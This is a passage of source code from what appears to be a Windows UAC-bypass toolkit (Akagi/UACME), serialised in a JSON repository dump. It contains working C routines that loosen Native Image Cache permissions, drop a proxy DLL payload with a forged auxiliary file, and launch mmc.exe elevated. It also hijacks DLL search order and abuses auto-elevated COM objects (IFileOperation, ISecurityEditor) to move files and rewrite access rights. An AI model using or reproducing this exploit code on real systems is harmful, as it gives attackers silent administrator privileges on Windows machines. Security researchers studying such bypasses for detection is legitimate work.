szBuffer[cchDirName] = 0;\n        RemoveDirectory(szBuffer);\n    }\n\n    if (SUCCEEDED(hr_init))\n        CoUninitialize();\n\n    if (MethodResult != STATUS_SUCCESS)\n        supSetGlobalCompletionEvent();\n\n    return MethodResult;\n}\n\nNTSTATUS ucmxGenerateAUX(\n    _In_ LPCWSTR AssemblyName,\n    _Out_ PVOID* AuxData,\n    _Out_ PSIZE_T AuxDataSize,\n    _Out_opt_ GUID* ModuleGuid\n)\n{\n    NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;\n    LPWSTR lpAssemblyFilePath = NULL;\n\n    HRESULT hr;\n    IAssemblyCache* asmCache = NULL;\n    IAssemblyEnum* asmEnum = NULL;\n    IAssemblyName* asmName = NULL;\n\n    GUID mvid;\n\n    LPWSTR lpAssemblyName = NULL, lpDisplayName = NULL;\n    LPSTR lpDisplayNameANSI = NULL;\n\n    BOOL bFound = FALSE;\n    SIZE_T 
auxSize = 0;\n    PBYTE auxPtr = NULL, pbPad;\n    PULONG dataPtr;\n\n    SIZE_T cchName = 0, cchDisplayName = 0, padBytes, i;\n\n    *AuxData = NULL;\n    *AuxDataSize = 0;\n\n    if (!fusUtilInitFusion((g_ctx->dwBuildNumber < NT_WIN8_RTM) ? 2 : 4))\n        return ntStatus;\n\n    RtlSecureZeroMemory(&mvid, sizeof(mvid));\n\n    do {\n\n        hr = g_ctx->FusionContext.CreateAssemblyEnum(&asmEnum, NULL, NULL, ASM_CACHE_GAC, NULL);\n        if ((FAILED(hr)) || (asmEnum == NULL))\n            break;\n\n        hr = g_ctx->FusionContext.CreateAssemblyCache(&asmCache, 0);\n        if ((FAILED(hr)) || (asmCache == NULL))\n            break;\n\n\n        //\n        // Locate assembly and remember its name/display name.\n        //\n        while ((hr = asmEnum->lpVtbl->GetNextAssembly(asmEnum, NULL, &asmName, 0)) == S_OK) {\n\n            if (SUCCEEDED(fusUtilGetAssemblyName(asmName,\n                &lpAssemblyName,\n                &cchName,\n                &lpDisplayName,\n                &cchDisplayName)))\n            {\n\n                if (_strcmpi(AssemblyName, lpAssemblyName) == 0) {\n                    bFound = TRUE;\n                    break;\n                }\n                else {\n                    supHeapFree(lpAssemblyName);\n                    supHeapFree(lpDisplayName);\n                    lpAssemblyName = NULL;\n                    lpDisplayName = NULL;\n                }\n\n            }\n\n            asmName->lpVtbl->Finalize(asmName);\n            asmName->lpVtbl->Release(asmName);\n            asmName = NULL;\n        }\n\n        if (FAILED(hr) || bFound == FALSE) {\n            if (asmName) {\n                asmName->lpVtbl->Finalize(asmName);\n                asmName->lpVtbl->Release(asmName);\n                asmName = NULL;\n            }\n            break;\n        }\n\n        lpDisplayNameANSI = (LPSTR)supHeapAlloc((1 + cchDisplayName) * sizeof(CHAR));\n        if (lpDisplayNameANSI == NULL)\n            break;\n\n        
WideCharToMultiByte(CP_ACP,\n            0,\n            lpDisplayName,\n            (INT)cchDisplayName,\n            lpDisplayNameANSI,\n            (INT)(1 + cchDisplayName),\n            NULL,\n            NULL);\n\n        //\n        // Query assembly filepath.\n        //\n        hr = fusUtilGetAssemblyPath(asmCache, AssemblyName, &lpAssemblyFilePath);\n        if (FAILED(hr))\n            break;\n\n        //\n        // Remember MVID.\n        //\n        if (!fusUtilGetImageMVID(lpAssemblyFilePath, &mvid))\n            break;\n\n        //\n        // Allocate buffer for AUX data.\n        //\n        auxSize = ALIGN_UP_TYPE(100 + (SIZE_T)cchDisplayName, sizeof(ULONG));\n        auxPtr = (PBYTE)supHeapAlloc(auxSize);\n        if (auxPtr == NULL)\n            break;\n\n        dataPtr = (PULONG)auxPtr;\n\n        //\n        // Magic values go brrr.\n        //\n\n        *dataPtr++ = 0x5;\n        *dataPtr++ = (ULONG)auxSize - 8;\n        *dataPtr++ = 0xB;\n        *dataPtr++ = (ULONG)auxSize - 16;\n        *dataPtr++ = 0xD;\n        *dataPtr++ = (ULONG)auxSize - 100;\n        RtlCopyMemory(dataPtr, lpDisplayNameANSI, cchDisplayName);\n\n        padBytes = (auxSize - 100) - cchDisplayName;\n\n        pbPad = (PBYTE)RtlOffsetToPointer(dataPtr, cchDisplayName);\n\n        for (i = 0; i < padBytes; i++)\n            *pbPad++ = 0xCC;\n\n        dataPtr = (PULONG)RtlOffsetToPointer(dataPtr, cchDisplayName + padBytes);\n\n        *dataPtr++ = 0x7;\n        *dataPtr++ = 0x4;\n        *dataPtr++ = 0x1109;\n        *dataPtr++ = 0x2;\n        *dataPtr++ = 0x8;\n        *dataPtr++ = 0;\n        *dataPtr++ = 0;\n        *dataPtr++ = 0xF;\n        *dataPtr++ = 0x4;\n        *dataPtr++ = 0;\n        *dataPtr++ = 0x10;\n        *dataPtr++ = 0x4;\n        *dataPtr++ = 0x1;\n        *dataPtr++ = 0x9;\n        *dataPtr++ = 0x10;\n\n        RtlCopyMemory(dataPtr, &mvid, sizeof(mvid));\n\n        *AuxData = auxPtr;\n        *AuxDataSize = auxSize;\n        if (ModuleGuid) 
*ModuleGuid = mvid;\n\n        ntStatus = STATUS_SUCCESS;\n\n    } while (FALSE);\n\n    if (lpAssemblyFilePath)\n        supHeapFree(lpAssemblyFilePath);\n\n    if (lpAssemblyName)\n        supHeapFree(lpAssemblyName);\n    if (lpDisplayName)\n        supHeapFree(lpDisplayName);\n    if (lpDisplayNameANSI)\n        supHeapFree(lpDisplayNameANSI);\n\n    if (asmName) {\n        asmName->lpVtbl->Finalize(asmName);\n        asmName->lpVtbl->Release(asmName);\n    }\n\n    if (asmCache)\n        asmCache->lpVtbl->Release(asmCache);\n\n    if (asmEnum)\n        asmEnum->lpVtbl->Release(asmEnum);\n\n    if (!NT_SUCCESS(ntStatus) && auxPtr)\n        supHeapFree(auxPtr);\n\n    return ntStatus;\n}\n\n/*\n* ucmNICPoisonMethod2\n*\n* Purpose:\n*\n* Bypass UAC by Dll hijack of Native Image Cache.\n*\n*/\nNTSTATUS ucmNICPoisonMethod2(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED, ntStatus;\n    WCHAR szFileName[MAX_PATH * 2];\n    WCHAR szTargetDir[MAX_PATH * 2];\n    WCHAR szCacheDir[MAX_PATH * 2];\n    WCHAR szMVID[64];\n\n    LPWSTR oldSecurity = NULL;\n    SIZE_T dirLen;\n    GUID targetMVID;\n\n    PVOID auxData = NULL;\n    SIZE_T auxDataSize;\n\n    BOOL bNeedSecurityReset = FALSE, bNeedRestore = FALSE;\n    BOOL IsWin7 = (g_ctx->dwBuildNumber < NT_WIN8_RTM);\n\n    do {\n\n        //\n        // Build cache path.\n        //\n        _strcpy(szCacheDir, g_ctx->szSystemRoot);\n        _strcat(szCacheDir, TEXT(\"assembly\\\\NativeImages_\"));\n\n        if (IsWin7)\n            _strcat(szCacheDir, NET2_DIR);\n        else\n            _strcat(szCacheDir, NET4_DIR);\n\n#ifdef _WIN64\n        _strcat(szCacheDir, TEXT(\"_64\"));\n#else\n        _strcat(szCacheDir, TEXT(\"_32\"));\n#endif\n        ntStatus = ucmxGenerateAUX(ASSEMBLY_MMCEX, &auxData, &auxDataSize, NULL);\n        if (!NT_SUCCESS(ntStatus)) {\n            MethodResult = ntStatus;\n            break;\n        }\n\n        
RtlSecureZeroMemory(&szMVID, sizeof(szMVID));\n        RtlSecureZeroMemory(&targetMVID, sizeof(targetMVID));\n        if (!fusUtilGetAssemblyMVIDFromZapCache(ASSEMBLY_MMCEX, &targetMVID))\n            break;\n\n        fusUtilBinToUnicodeHex((PBYTE)&targetMVID, sizeof(GUID), szMVID);\n\n        //\n        // Remember old directory security permissions.\n        //\n        if (!ucmMasqueradedGetObjectSecurityCOM(szCacheDir,\n            DACL_SECURITY_INFORMATION,\n            SE_FILE_OBJECT,\n            &oldSecurity))\n        {\n            break;\n        }\n\n        //\n        // Reset target file permissions.\n        //\n        if (!ucmMasqueradedSetObjectSecurityCOM(szCacheDir,\n            DACL_SECURITY_INFORMATION,\n            SE_FILE_OBJECT,\n            T_SDDL_EVERYONE_FULL_ACCESS))\n        {\n            break;\n        }\n\n        bNeedSecurityReset = TRUE;\n\n        //\n        // Move MMCEx to MMCEx.$\n        //\n        _strcpy(szFileName, szCacheDir);\n        _strcat(szFileName, MMCEX_DIR);\n\n        _strcpy(szTargetDir, szFileName);\n        _strcat(szTargetDir, TEXT(\".$\"));\n\n        if (!MoveFileEx(szFileName,\n            szTargetDir,\n            MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH))\n        {\n            break;\n        }\n\n        bNeedRestore = TRUE;\n\n        //\n        // 1. MMCEx\n        // 2. MMCEx\\<MVID>\\\n        // 3. MMCEx\\<MVID>\\MMCEx.ni.dll\n        // 4. MMCEx\\<MVID>\\MMCEx.ni.aux\n        //\n        // 1. MMCEx\n        //\n        if (!CreateDirectory(szFileName, NULL))\n            if (GetLastError() != ERROR_ALREADY_EXISTS) {\n                break;\n            }\n\n        //\n        // 2. Subdirectory <MVID>\n        //\n        supPathAddBackSlash(szFileName);\n        _strcat(szFileName, szMVID);\n        if (!CreateDirectory(szFileName, NULL))\n            if (GetLastError() != ERROR_ALREADY_EXISTS) {\n                break;\n            }\n\n        //\n        // 3. 
Drop payload.\n        //\n        supPathAddBackSlash(szFileName);\n        dirLen = _strlen(szFileName);\n        _strcat(szFileName, MMCEX_NI_DLL);\n        if (!supWriteBufferToFile(szFileName, ProxyDll, ProxyDllSize)) {\n            break;\n        }\n\n        //\n        // 4. Drop aux payload.\n        //\n        szFileName[dirLen] = 0;\n        _strcat(szFileName, MMCEX_NI_DLL_AUX);\n        if (!supWriteBufferToFile(szFileName, auxData, (ULONG)auxDataSize)) {\n            break;\n        }\n\n        //\n        // Run target.\n        //\n        _strcpy(szFileName, g_ctx->szSystemDirectory);\n        _strcat(szFileName, MMC_EXE);\n\n        if (supRunProcess2(szFileName,\n            WF_MSC,\n            NULL,\n            SW_SHOW,\n            SUPRUNPROCESS_TIMEOUT_DEFAULT))\n        {\n            MethodResult = STATUS_SUCCESS;\n        }\n\n    } while (FALSE);\n\n\n    if (bNeedRestore) {\n\n        //\n        // Remove fake directory.\n        //\n        _strcpy(szFileName, szCacheDir);\n        _strcat(szFileName, MMCEX_DIR);\n        supRemoveDirectoryRecursive(szFileName);\n\n        //\n        // Restore original MMCEx directory.\n        //\n        _strcat(szFileName, TEXT(\".$\"));\n        _strcpy(szTargetDir, szCacheDir);\n        _strcat(szTargetDir, MMCEX_DIR);\n        MoveFileEx(szFileName,\n            szTargetDir,\n            MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH);\n\n    }\n\n    //\n    // Revert directory security.\n    //\n    if (oldSecurity) {\n\n        if (bNeedSecurityReset) {\n            ucmMasqueradedSetObjectSecurityCOM(szCacheDir,\n                DACL_SECURITY_INFORMATION,\n                SE_FILE_OBJECT,\n                oldSecurity);\n        }\n\n        CoTaskMemFree(oldSecurity);\n    }\n\n    if (auxData)\n        supHeapFree(auxData);\n\n    if (!NT_SUCCESS(MethodResult))\n        supSetGlobalCompletionEvent();\n\n    return MethodResult;\n}\n\n/*\n* ucmAtlHijackMethod\n*\n* Purpose:\n*\n* 
Bypass UAC by abusing search order of WMI management console dependency dll.\n*\n*/\nNTSTATUS ucmAtlHijackMethod(\n    _In_opt_ LPCWSTR lpTargetApp,\n    _In_ LPCWSTR lpTargetDll,\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    return ucmGenericAutoelevationEx(lpTargetApp,\n        lpTargetDll,\n        WMIMGMT_MSC,\n        WBEM_DIR,\n        ProxyDll,\n        ProxyDllSize);\n}\n"
  },
  {
    "path": "Source/Akagi/methods/comsup.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2017 - 2021\n*\n*  TITLE:       COMSUP.C\n*\n*  VERSION:     3.57\n*\n*  DATE:        01 Nov 2021\n*\n*  COM interfaces based routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\n/*\n* ucmAllocateElevatedObject\n*\n* Purpose:\n*\n* CoGetObject elevation as admin.\n*\n*/\nHRESULT ucmAllocateElevatedObject(\n    _In_ LPCWSTR lpObjectCLSID,\n    _In_ REFIID riid,\n    _In_ DWORD dwClassContext,\n    _Outptr_ void **ppv\n)\n{\n    DWORD       classContext;\n    HRESULT     hr = E_FAIL;\n    PVOID       ElevatedObject = NULL;\n\n    /*\n    CLSID       xCLSID;\n    IUnknown   *IBase;\n    */\n\n    BIND_OPTS3  bop;\n    WCHAR       szMoniker[MAX_PATH];\n\n    do {\n\n        if (_strlen(lpObjectCLSID) > 64)\n            break;\n\n        /*\n        if (NOERROR == CLSIDFromString(\n            lpObjectCLSID,\n            &xCLSID))\n        {\n            hr = CoCreateInstance(\n                &xCLSID,\n                NULL,\n                CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,\n                riid,\n                &IBase);\n\n            if (hr == S_OK) {\n                IBase->lpVtbl->Release(IBase);\n            }\n        }\n        */\n\n        RtlSecureZeroMemory(&bop, sizeof(bop));\n        bop.cbStruct = sizeof(bop);\n\n        classContext = dwClassContext;\n        if (dwClassContext == 0)\n            classContext = CLSCTX_LOCAL_SERVER;\n\n        bop.dwClassContext = classContext;\n\n        _strcpy(szMoniker, T_ELEVATION_MONIKER_ADMIN);\n        _strcat(szMoniker, lpObjectCLSID);\n\n        hr = 
CoGetObject(szMoniker, (BIND_OPTS *)&bop, riid, &ElevatedObject);\n\n    } while (FALSE);\n\n    *ppv = ElevatedObject;\n\n    return hr;\n}\n\n/*\n* ucmxFileOpCreateAndRelease\n*\n* Purpose:\n*\n* Test create new instance IFileOperation.\n*\n*/\nVOID ucmxFileOpCreateAndRelease(VOID)\n{\n    IFileOperation *FileOperation = NULL;\n\n    if (S_OK != CoCreateInstance(\n        &CLSID_FileOperation,\n        NULL,\n        CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,\n        &IID_IFileOperation,\n        &FileOperation))\n    {\n        return;\n    }\n\n    if (FileOperation != NULL) {\n        FileOperation->lpVtbl->Release(FileOperation);\n    }\n}\n\n/*\n* ucmMasqueradedRenameElementCOM\n*\n* Purpose:\n*\n* Rename file/directory autoelevated.\n* This function expects that supMasqueradeProcess was called on process initialization.\n*\n*/\nBOOL ucmMasqueradedRenameElementCOM(\n    _In_ LPCWSTR OldName,\n    _In_ LPCWSTR NewName\n)\n{\n    BOOL                bResult = FALSE;\n    IFileOperation     *FileOperation = NULL;\n    IShellItem         *psiDestDir = NULL;\n    HRESULT             hr_init;\n\n    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n    do {\n\n        //ucmxFileOpCreateAndRelease();\n\n        if (S_OK != ucmAllocateElevatedObject(\n            T_CLSID_FileOperation,\n            &IID_IFileOperation,\n            CLSCTX_LOCAL_SERVER,\n            &FileOperation))\n        {\n            break;\n        }\n\n        if (FileOperation == NULL) {\n            break;\n        }\n\n        if (S_OK != FileOperation->lpVtbl->SetOperationFlags(\n            FileOperation,\n            g_ctx->IFileOperationFlags))\n        {\n            break;\n        }\n\n        if (S_OK != SHCreateItemFromParsingName(\n            OldName,\n            NULL,\n            &IID_IShellItem,\n            &psiDestDir))\n        {\n            break;\n        }\n\n        if (S_OK != FileOperation->lpVtbl->RenameItem(\n            
FileOperation,\n            psiDestDir,\n            NewName,\n            NULL))\n        {\n            break;\n        }\n\n        if (S_OK != FileOperation->lpVtbl->PerformOperations(\n            FileOperation))\n        {\n            break;\n        }\n\n        psiDestDir->lpVtbl->Release(psiDestDir);\n        psiDestDir = NULL;\n\n        bResult = TRUE;\n\n    } while (FALSE);\n\n    if (FileOperation != NULL) {\n        FileOperation->lpVtbl->Release(FileOperation);\n    }\n\n    if (psiDestDir != NULL) {\n        psiDestDir->lpVtbl->Release(psiDestDir);\n    }\n\n    if (hr_init == S_OK)\n        CoUninitialize();\n\n    return bResult;\n}\n\n/*\n* ucmMasqueradedCreateSubDirectoryCOM\n*\n* Purpose:\n*\n* Create directory autoelevated.\n* This function expects that supMasqueradeProcess was called on process initialization.\n*\n*/\nBOOL ucmMasqueradedCreateSubDirectoryCOM(\n    _In_ LPCWSTR ParentDirectory,\n    _In_ LPCWSTR SubDirectory\n)\n{\n    BOOL                bResult = FALSE;\n    IFileOperation     *FileOperation = NULL;\n    IShellItem         *psiDestDir = NULL;\n    HRESULT             hr_init;\n\n    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n    do {\n\n        //ucmxFileOpCreateAndRelease();\n\n        if (S_OK != ucmAllocateElevatedObject(\n            T_CLSID_FileOperation,\n            &IID_IFileOperation,\n            CLSCTX_LOCAL_SERVER,\n            &FileOperation))\n        {\n            break;\n        }\n\n        if (FileOperation == NULL) {\n            break;\n        }\n\n        if (S_OK != FileOperation->lpVtbl->SetOperationFlags(\n            FileOperation,\n            g_ctx->IFileOperationFlags))\n        {\n            break;\n        }\n\n        if (S_OK != SHCreateItemFromParsingName(\n            ParentDirectory,\n            NULL,\n            &IID_IShellItem,\n            &psiDestDir))\n        {\n            break;\n        }\n\n        if (S_OK != FileOperation->lpVtbl->NewItem(\n            
FileOperation,\n            psiDestDir,\n            FILE_ATTRIBUTE_DIRECTORY,\n            SubDirectory,\n            NULL,\n            NULL))\n        {\n            break;\n        }\n\n        if (S_OK != FileOperation->lpVtbl->PerformOperations(\n            FileOperation))\n        {\n            break;\n        }\n\n        psiDestDir->lpVtbl->Release(psiDestDir);\n        psiDestDir = NULL;\n\n        bResult = TRUE;\n\n    } while (FALSE);\n\n    if (FileOperation != NULL) {\n        FileOperation->lpVtbl->Release(FileOperation);\n    }\n\n    if (psiDestDir != NULL) {\n        psiDestDir->lpVtbl->Release(psiDestDir);\n    }\n\n    if (hr_init == S_OK)\n        CoUninitialize();\n\n    return bResult;\n}\n\n/*\n* ucmMasqueradedMoveCopyFileCOM\n*\n* Purpose:\n*\n* Move or Copy file autoelevated.\n* This function expects that supMasqueradeProcess was called on process initialization.\n*\n*/\nBOOL ucmMasqueradedMoveCopyFileCOM(\n    _In_ LPCWSTR SourceFileName,\n    _In_ LPCWSTR DestinationDir,\n    _In_ BOOL fMove\n)\n{\n    BOOL                bResult = FALSE;\n    IFileOperation     *FileOperation = NULL;\n    IShellItem         *isrc = NULL, *idst = NULL;\n    HRESULT             r = E_FAIL, hr_init;\n\n    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n    do {\n\n        //ucmxFileOpCreateAndRelease();\n\n        if (S_OK != ucmAllocateElevatedObject(\n            T_CLSID_FileOperation,\n            &IID_IFileOperation,\n            CLSCTX_LOCAL_SERVER,\n            &FileOperation))\n        {\n            break;\n        }\n\n        if (FileOperation == NULL) {\n            break;\n        }\n\n        if (S_OK != FileOperation->lpVtbl->SetOperationFlags(\n            FileOperation,\n            g_ctx->IFileOperationFlags))\n        {\n            break;\n        }\n\n        if (S_OK != SHCreateItemFromParsingName(\n            SourceFileName,\n            NULL,\n            &IID_IShellItem,\n            &isrc))\n        {\n            
break;\n        }\n\n        if (S_OK != SHCreateItemFromParsingName(\n            DestinationDir,\n            NULL,\n            &IID_IShellItem,\n            &idst))\n        {\n            break;\n        }\n\n        if (fMove) {\n            r = FileOperation->lpVtbl->MoveItem(\n                FileOperation,\n                isrc,\n                idst,\n                NULL,\n                NULL);\n        }\n        else {\n            r = FileOperation->lpVtbl->CopyItem(\n                FileOperation,\n                isrc,\n                idst,\n                NULL,\n                NULL);\n        }\n\n        if (r != S_OK)\n            break;\n\n        if (S_OK != FileOperation->lpVtbl->PerformOperations(\n            FileOperation))\n        {\n            break;\n        }\n\n        idst->lpVtbl->Release(idst);\n        idst = NULL;\n        isrc->lpVtbl->Release(isrc);\n        isrc = NULL;\n\n        bResult = TRUE;\n\n    } while (FALSE);\n\n    if (FileOperation != NULL)\n        FileOperation->lpVtbl->Release(FileOperation);\n\n    if (isrc != NULL)\n        isrc->lpVtbl->Release(isrc);\n\n    if (idst != NULL)\n        idst->lpVtbl->Release(idst);\n\n    if (hr_init == S_OK)\n        CoUninitialize();\n\n    return bResult;\n}\n\n/*\n* ucmMasqueradedDeleteDirectoryFileCOM\n*\n* Purpose:\n*\n* Delete directory or file autoelevated.\n* This function expects that supMasqueradeProcess was called on process initialization.\n*\n*/\nBOOL ucmMasqueradedDeleteDirectoryFileCOM(\n    _In_ LPCWSTR FileName\n)\n{\n    BOOL                bResult = FALSE;\n    IFileOperation     *FileOperation = NULL;\n    IShellItem         *isrc = NULL;\n    HRESULT             r = E_FAIL, hr_init;\n\n    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n    do {\n\n        //ucmxFileOpCreateAndRelease();\n\n        if (S_OK != ucmAllocateElevatedObject(\n            T_CLSID_FileOperation,\n            &IID_IFileOperation,\n            
CLSCTX_LOCAL_SERVER,\n            &FileOperation))\n        {\n            break;\n        }\n\n        if (FileOperation == NULL) {\n            break;\n        }\n\n        if (S_OK != FileOperation->lpVtbl->SetOperationFlags(\n            FileOperation,\n            g_ctx->IFileOperationFlags))\n        {\n            break;\n        }\n\n        if (S_OK != SHCreateItemFromParsingName(\n            FileName,\n            NULL,\n            &IID_IShellItem,\n            &isrc))\n        {\n            break;\n        }\n\n        r = FileOperation->lpVtbl->DeleteItem(\n            FileOperation,\n            isrc,\n            NULL);\n\n        if (r != S_OK)\n            break;\n\n        if (S_OK != FileOperation->lpVtbl->PerformOperations(\n            FileOperation))\n        {\n            break;\n        }\n\n        isrc->lpVtbl->Release(isrc);\n        isrc = NULL;\n\n        bResult = TRUE;\n\n    } while (FALSE);\n\n    if (FileOperation != NULL)\n        FileOperation->lpVtbl->Release(FileOperation);\n\n    if (isrc != NULL)\n        isrc->lpVtbl->Release(isrc);\n\n    if (hr_init == S_OK)\n        CoUninitialize();\n\n#ifdef _DEBUG\n    if (bResult) {\n        OutputDebugString(FileName);\n        OutputDebugString(TEXT(\"\\r\\nCleanup success\\r\\n\"));\n    }\n    else {\n        OutputDebugString(TEXT(\"\\r\\nCleanup failed\\r\\n\"));\n    }\n#endif\n\n    return bResult;\n}\n\n/*\n* ucmMasqueradedMoveFileCOM\n*\n* Purpose:\n*\n* Move file autoelevated.\n* This function expects that supMasqueradeProcess was called on process initialization.\n*\n*/\nBOOL ucmMasqueradedMoveFileCOM(\n    _In_ LPCWSTR SourceFileName,\n    _In_ LPCWSTR DestinationDir\n)\n{\n    return ucmMasqueradedMoveCopyFileCOM(\n        SourceFileName,\n        DestinationDir,\n        TRUE);\n}\n\n/*\n* ucmMasqueradedGetObjectSecurityCOM\n*\n* Purpose:\n*\n* Get object security through ISecurityEditor(GetNamedInfo).\n* This function expects that supMasqueradeProcess was called on 
process initialization.\n* \n* Note:\n* Use CoTaskMemFree to release the memory allocated for Sddl, as SecurityEditor->GetSecurity uses SHStrDupW to store the resulting SDDL.\n*\n*/\nBOOL ucmMasqueradedGetObjectSecurityCOM(\n    _In_ LPCWSTR lpTargetObject,\n    _In_ SECURITY_INFORMATION SecurityInformation,\n    _In_ SE_OBJECT_TYPE ObjectType,\n    _Inout_ LPOLESTR *Sddl\n)\n{\n    HRESULT          r = E_FAIL, hr_init;\n    ISecurityEditor* SecurityEditor = NULL;\n\n    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n    do {\n\n        r = ucmAllocateElevatedObject(\n            T_CLSID_ShellSecurityEditor,\n            &IID_ISecurityEditor,\n            CLSCTX_LOCAL_SERVER,\n            &SecurityEditor);\n\n        if (r != S_OK)\n            break;\n\n        if (SecurityEditor == NULL) {\n            r = E_OUTOFMEMORY;\n            break;\n        }\n\n        r = SecurityEditor->lpVtbl->GetSecurity(\n            SecurityEditor,\n            lpTargetObject,\n            ObjectType,\n            SecurityInformation,\n            Sddl);\n\n    } while (FALSE);\n\n    if (SecurityEditor != NULL) {\n        SecurityEditor->lpVtbl->Release(SecurityEditor);\n    }\n\n    if (hr_init == S_OK)\n        CoUninitialize();\n\n    return SUCCEEDED(r);\n}\n\n/*\n* ucmMasqueradedSetObjectSecurityCOM\n*\n* Purpose:\n*\n* Change object security through ISecurityEditor(SetNamedInfo).\n* This function expects that supMasqueradeProcess was called on process initialization.\n*\n*/\nBOOL ucmMasqueradedSetObjectSecurityCOM(\n    _In_ LPCWSTR lpTargetObject,\n    _In_ SECURITY_INFORMATION SecurityInformation,\n    _In_ SE_OBJECT_TYPE ObjectType,\n    _In_ LPCWSTR NewSddl\n)\n{\n    HRESULT          r = E_FAIL, hr_init;\n    ISecurityEditor* SecurityEditor = NULL;\n\n    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n    do {\n\n        r = ucmAllocateElevatedObject(\n            T_CLSID_ShellSecurityEditor,\n            &IID_ISecurityEditor,\n            
CLSCTX_LOCAL_SERVER,\n            &SecurityEditor);\n\n        if (r != S_OK)\n            break;\n\n        if (SecurityEditor == NULL) {\n            r = E_OUTOFMEMORY;\n            break;\n        }\n\n        r = SecurityEditor->lpVtbl->SetSecurity(\n            SecurityEditor,\n            lpTargetObject,\n            ObjectType,\n            SecurityInformation,\n            NewSddl);\n\n    } while (FALSE);\n\n    if (SecurityEditor != NULL) {\n        SecurityEditor->lpVtbl->Release(SecurityEditor);\n    }\n\n    if (hr_init == S_OK)\n        CoUninitialize();\n\n    return SUCCEEDED(r);\n}\n"
  },
  {
    "path": "Source/Akagi/methods/comsup.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2017 - 2022\n*\n*  TITLE:       COMSUP.H\n*\n*  VERSION:     3.63\n*\n*  DATE:        16 Jul 2022\n*\n*  Prototypes and definitions for COM interfaces and routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#define HRESULT_BREAK_ON_FAILED(hr) { if (FAILED(hr)) break; }\n#define HRESULT_RETURN_ON_FAILED(hr) { if (FAILED(hr)) return; }\n#define HRESULT_RETURN_VALUE_ON_FAILED(hr, value) { if (FAILED(hr)) return value; } \n\n#ifndef UCM_DEFINE_GUID\n#define UCM_DEFINE_GUID(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8) \\\n     EXTERN_C const GUID DECLSPEC_SELECTANY name \\\n                = { l, w1, w2, { b1, b2,  b3,  b4,  b5,  b6,  b7,  b8 } }  \n#endif\n\nUCM_DEFINE_GUID(IID_IColorDataProxy, 0x0A16D195, 0x6F47, 0x4964, 0x92, 0x87, 0x9F, 0x4B, 0xAB, 0x6D, 0x98, 0x27);\nUCM_DEFINE_GUID(IID_ICMLuaUtil, 0x6EDD6D74, 0xC007, 0x4E75, 0xB7, 0x6A, 0xE5, 0x74, 0x09, 0x95, 0xE2, 0x4C);\nUCM_DEFINE_GUID(IID_IFwCplLua, 0x56DA8B35, 0x7FC3, 0x45DF, 0x87, 0x68, 0x66, 0x41, 0x47, 0x86, 0x45, 0x73);\nUCM_DEFINE_GUID(IID_ISecurityEditor, 0x14B2C619, 0xD07A, 0x46EF, 0x8B, 0x62, 0x31, 0xB6, 0x4F, 0x3B, 0x84, 0x5C);\nUCM_DEFINE_GUID(IID_EditionUpgradeManager, 0xF2DCB80D, 0x0670, 0x44BC, 0x90, 0x02, 0xCD, 0x18, 0x68, 0x87, 0x30, 0xAF);\nUCM_DEFINE_GUID(IID_IEAxiAdminInstaller, 0x9AEA8A59, 0xE0C9, 0x40F1, 0x87, 0xDD, 0x75, 0x70, 0x61, 0xD5, 0x61, 0x77);\nUCM_DEFINE_GUID(IID_IEAxiInstaller2, 0xBC0EC710, 0xA3ED, 0x4F99, 0xB1, 0x4F, 0x5F, 0xD5, 0x9F, 0xDA, 0xCE, 0xA3);\nUCM_DEFINE_GUID(IID_WscAdmin, 0x49ACAA99, 0xF009, 0x4524, 0x9D, 0x2A, 0xD7, 0x51, 0xC9, 0xA3, 0x8F, 
